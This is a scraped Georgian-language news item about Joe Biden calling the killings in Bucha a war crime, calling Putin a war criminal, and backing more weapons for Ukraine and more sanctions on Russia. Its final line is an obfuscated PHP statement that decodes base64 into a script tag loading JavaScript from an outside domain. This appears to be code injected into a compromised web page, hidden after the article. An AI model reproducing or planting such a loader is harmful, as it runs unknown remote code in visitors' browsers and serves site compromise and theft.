celsiusi
ავერსი საქკაბელი
აშშ-ს პრეზიდენტი ჯო ბაიდენი ქალაქ ბუჩაში მომხდარ სისასტიკეს გამოეხმაურა და განაცხადა – "ის, რაც ბუჩაში მოხდა, არის აღმაშფოთებელი და ეს ყველამ ნახა, ვფიქრობ, ეს არის ომის დანაშაული. ეს კაცი (პუტინი) სასტიკია".  
 
„შეიძლება გახსოვთ, გამაკრიტიკეს იმის გამო, რომ პუტინს ომის დამნაშავე ვუწოდე. თქვენ ნახეთ, რაც მოხდა ბუჩაში... ის ომის დამნაშავეა. ჩვენ უნდა შევაგროვოთ ინფორმაცია... ჩვენ უნდა გავაგრძელოთ უკრაინისთვის იარაღის მიწოდება, რომელიც მას ბრძოლის გასაგრძელებლად სჭირდება. ჩვენ უნდა მივიღოთ ყველა დეტალი, რათა ამ საქმეზე ომის დანაშაულების სასამართლო პროცესი გაიმართოს. მან [პუტინმა] პასუხი უნდა აგოს“, - დასძინა თეთრი სახლის ლიდერმა.
 
ამასთან ბაიდენმა აღნიშნა, რომ ის რუსეთის წინააღმდეგ უფრო მეტი სანქციების დაწესების მომხრეა.
974
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");